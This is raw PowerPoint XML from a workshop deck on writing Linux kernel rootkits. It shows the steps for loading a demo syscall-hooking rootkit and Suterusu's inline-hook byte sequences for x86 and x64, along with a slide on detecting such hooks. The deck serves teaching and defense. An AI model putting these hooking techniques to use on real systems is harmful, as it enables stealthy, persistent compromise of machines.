        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>echo “fingers crossed” &amp;&amp; make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>insmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myrootkit.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Screen should be spamming “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rmmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myrootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to stop the madness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Congrats! You’ve just written a rootkit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688050063"/>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Modern kernel rootkit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/mncoppola/suterusu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Suterusu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Works on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inux 2.6, Linux 3.x, x86, x86_64, AMD64, and ARM (so probably yes, Android)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218574358"/>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Suterusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hooks two different ways</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace the pointer to the system call in sys call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>table (what we did in the demo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or, write over the beginning the original system call, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>modify instructions to jump to another function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Second way is more complex, requires rewriting the first few bytes of the original system call, and re-implementing  the original call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230552261"/>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Jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from original SC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371214"/>
            <a:ext cx="8819910" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>//Taken from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>suterusu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>//x86:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>push $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>n_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>//x64:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>n_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>, "\x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" dirty="0"/>
              <a:t>\xe0", HIJACK_SIZE);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283580" y="3483980"/>
            <a:ext cx="8524754" cy="3252486"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because the above clobbers some of the original system call, for the above to work, you will need to write replacement code for the original system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call back original system call since we are not copying the pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, for cleanliness, you need to copy the bytes that you clobber, so that when you unhook, you can safely replace the old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="782433444"/>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Detection</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Monitor IDT for changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monitor SCT for changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monitor the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> bytes of each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, rehash in an interval, monitor for changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Issue is memory usage, would have to periodically check for changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Above three methods require a clean baseline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyze memory addresses in SCT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monitor other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hookable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> kernel functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227452352"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="723632161"/>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457200" y="570328"/>
            <a:ext cx="8686800" cy="6010236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="115888"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s a kernel?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260475" y="6395898"/>
            <a:ext cx="6779420" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When I said there is no popcorn I lied, there is actually popcorn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1251963492"/>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814638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But actually…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3699966204"/>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OS Kernel</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The Kernel is the ‘core’ of the computer, that processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hardware input/output, interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Translation of instructions from text to CPU </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory management, user space process execution, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As defined by Stallman, what we know as “Linux” is an operating system kernel, and added on user applications are elements of the GNU/Linux operating system itself</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2739789657"/>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6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="6619875"/>
            <a:ext cx="9080500" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/wiki/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>File:Linux_kernel_map.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419715201"/>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Basic kernel design</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698625" y="1592263"/>
            <a:ext cx="5588000" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1328545290"/>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Revolution">
      <a:majorFont>
        <a:latin typeface="Trebuchet MS"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ ゴシック"/>
        <a:font script="Hans" typeface="宋体"/>
        <a:font script="Hant" typeface="新細明體"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Trebuchet MS"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ ゴシック"/>
        <a:font script="Hans" typeface="宋体"/>
        <a:font script="Hant" typeface="新細明體"/>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DE64AEEDD9B7A4D93545ACBE97D4615" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f49002b78e3a4a71b814eef46a983816">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="http://schemas.microsoft.com/sharepoint/v3/fields" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="38f6db2dd0d9a0cf6a8dc37be32b365b" ns2:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3/fields"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:_Status" minOccurs="0"/>
                <xsd:element ref="ns2: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8" nillable="true" ma:displayName="Status" ma:default="Not Started" ma:internalName="_Status">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element name="_Version" ma:index="9"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ma:displayName="Status"/>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Status xmlns="http://schemas.microsoft.com/sharepoint/v3/fields">Not Started</_Status>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E4214858-785C-42F7-BE66-6D0E79395F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7D2A1B0-FF3E-4009-940D-AED0EB70AA20}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7B6F2769-7194-4217-93D3-3AF3A4742282}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/fields"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>FNEMasterTemplateForThemePreview.pptx</Template>
  <TotalTime>9411</TotalTime>
  <Words>2808</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>387</Paragraphs>
  <Slides>47</Slides>
  <Notes>17</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>47</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="48" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Hey kids: Do you like injecting code into OS kernels for profit? (Yeah!)</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>What’s a kernel?</vt:lpstr>
      <vt:lpstr>But actually…</vt:lpstr>
      <vt:lpstr>OS Kernel</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basic kernel design</vt:lpstr>
      <vt:lpstr>Kernel vs. Userspace Memory</vt:lpstr>
      <vt:lpstr>Userapp-Kernel communication</vt:lpstr>
      <vt:lpstr>OS Elements</vt:lpstr>
      <vt:lpstr>System interrupt</vt:lpstr>
      <vt:lpstr>Hardware interrupt vs. Software interrupt</vt:lpstr>
      <vt:lpstr>Interrupt Descriptor Table</vt:lpstr>
      <vt:lpstr>System calls</vt:lpstr>
      <vt:lpstr>System calls</vt:lpstr>
      <vt:lpstr>System calls</vt:lpstr>
      <vt:lpstr>int 0x80 usage</vt:lpstr>
      <vt:lpstr>System call table</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Here’s the file</vt:lpstr>
      <vt:lpstr>Thanks Greg</vt:lpstr>
      <vt:lpstr>What kernel rootkits modify</vt:lpstr>
      <vt:lpstr>How rootkits get into the kernel</vt:lpstr>
      <vt:lpstr>Break time</vt:lpstr>
      <vt:lpstr>Hello world module</vt:lpstr>
      <vt:lpstr>Hello world module</vt:lpstr>
      <vt:lpstr>Hello world module</vt:lpstr>
      <vt:lpstr>Hooking: The Concept</vt:lpstr>
      <vt:lpstr>Hooking: The Concept</vt:lpstr>
      <vt:lpstr>Finding the syscall_table</vt:lpstr>
      <vt:lpstr>Finding the syscall_table</vt:lpstr>
      <vt:lpstr>Syscall hooking</vt:lpstr>
      <vt:lpstr>Bypassing kernel write protections</vt:lpstr>
      <vt:lpstr>cr0</vt:lpstr>
      <vt:lpstr>Hooking sys_write</vt:lpstr>
      <vt:lpstr>Hooking sys_write</vt:lpstr>
      <vt:lpstr>myrootkit.c</vt:lpstr>
      <vt:lpstr>myrootkit.c</vt:lpstr>
      <vt:lpstr>myrootkit.c</vt:lpstr>
      <vt:lpstr>Compile and run!</vt:lpstr>
      <vt:lpstr>Modern kernel rootkit</vt:lpstr>
      <vt:lpstr>Suterusu hooks two different ways</vt:lpstr>
      <vt:lpstr>Jmp from original SC</vt:lpstr>
      <vt:lpstr>Detection</vt:lpstr>
      <vt:lpstr>Questions?</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FileNewTemplate</dc:title>
  <dc:creator>Diana</dc:creator>
  <cp:lastModifiedBy>Greg Bekher</cp:lastModifiedBy>
  <cp:revision>96</cp:revision>
